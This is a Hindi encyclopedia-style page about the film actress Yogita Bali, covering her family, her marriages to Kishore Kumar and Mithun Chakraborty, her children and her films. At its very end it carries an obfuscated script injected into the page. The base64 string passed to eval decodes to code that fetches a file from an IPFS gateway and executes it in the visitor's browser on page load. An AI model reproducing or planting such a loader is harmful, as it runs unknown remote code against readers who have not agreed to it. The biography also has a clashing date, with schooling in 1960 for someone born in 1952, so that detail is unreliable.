योगिता बाली का परिचय

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:नेविगेशन, खोजें
योगिता बाली विषय सूची


योगिता बाली का परिचय
योगिता बाली
योगिता बाली
पूरा नाम योगिता बाली
जन्म 13 अगस्त, 1952
जन्म भूमि मुम्बई, महाराष्ट्र
अभिभावक पिता- जसवंत, माता- हरदर्शन कौर
पति/पत्नी किशोर कुमार, मिथुन चक्रवर्ती
कर्म भूमि भारत
कर्म-क्षेत्र हिन्दी सिनेमा
मुख्य फ़िल्में 'परवाना', 'एक मुठ्ठी आसमान', 'चौकीदार', 'अजनबी', 'नागिन', 'महबूबा', 'चाचा भतीजा', 'भक्ति में शक्ति', 'जानी दुश्मन', 'जमाने को दिखाना है', 'राजतिलक' आदि।
प्रसिद्धि अभिनेत्री
नागरिकता भारतीय
अन्य जानकारी योगिता बाली 1950-1964 के दौर की मशहूर अभिनेत्री गीता बाली की भांजी हैं। मशहूर निर्देशक आदित्य राज कपूर और निर्माता कंचन खेतान देसाई उनके चचेरे भाई हैं।
अद्यतन‎

योगिता बाली का जन्म मुंबई, महाराष्ट्र के पंजाबी परिवार में 13 अगस्त, 1952 को हुआ था। उनके पिता का नाम जसवंत और मां का नाम हरदर्शन कौर था। योगिता 1950-1964 के दौर की मशहूर अभिनेत्री गीता बाली की भांजी हैं। मशहूर निर्देशक आदित्य राज कपूर और निर्माता कंचन खेतान देसाई योगिता बाली के चचेरे भाई हैं। योगिता ने अपनी शिक्षा कोलकाता विश्वविद्यालय से 1960 के दौरान ली।

विवाह

योगिता ने सन 1976 में बॉलीवुड के लोकप्रिय संगीतकार और अभिनेता किशोर कुमार से विवाह किया और उनकी तीसरी पत्नी बनीं। लेकिन उनकी शादी 1978 में टूट गई। किशोर कुमार ने योगिता को अपने जन्मदिन (4 अगस्त) के मौके पर तलाक दे दिया था। किशोर कुमार से तलाक लेने के एक साल बाद 1979 में योगिता बाली ने बॉलीवुड के एक और प्रसिद्ध अभिनेता मिथुन चक्रवर्ती से विवाह कर लिया। उनसे उन्हें चार बच्चे- महाक्षय चक्रवर्ती, दिशानी चक्रवर्ती, उषमय चक्रवर्ती और नमाषी चक्रवर्ती हुए। योगिता के बड़े बेटे महाक्षय चक्रवर्ती का पहले नाम मिमोह चक्रवर्ती था, जिसको उन्होंने बॉलीवुड में आने के बाद बदलकर महाक्षय चक्रवर्ती कर लिया।

कॅरियर

योगिता बाली का गीता बाली से रिश्ता होने की वजह से उन्हें [[1971] में बनी फिल्म ‘परवाना’ में अभिनय करने का मौका मिला। इस फिल्म में उन्होंने बॉलीवुड एक्टर अमिताभ बच्चन के साथ फ़िल्मी पर्दे पर अभिनय किया और दूसरी मुख्य अभिनेत्री के रूप में काम किया। हालांकि 1979 में मिथुन चक्रवर्ती से विवाह के बाद योगिता ने फिल्मों में काम करना कम कर दिया था। योगिता ने 1989 में फिल्म ‘आखिरी बदला’ में मिथुन चक्रवर्ती के साथ काम किया। इसके बाद उन्होंने कोई फिल्म नहीं की।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

बाहरी कड़ियाँ

संबंधित लेख

योगिता बाली विषय सूची

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>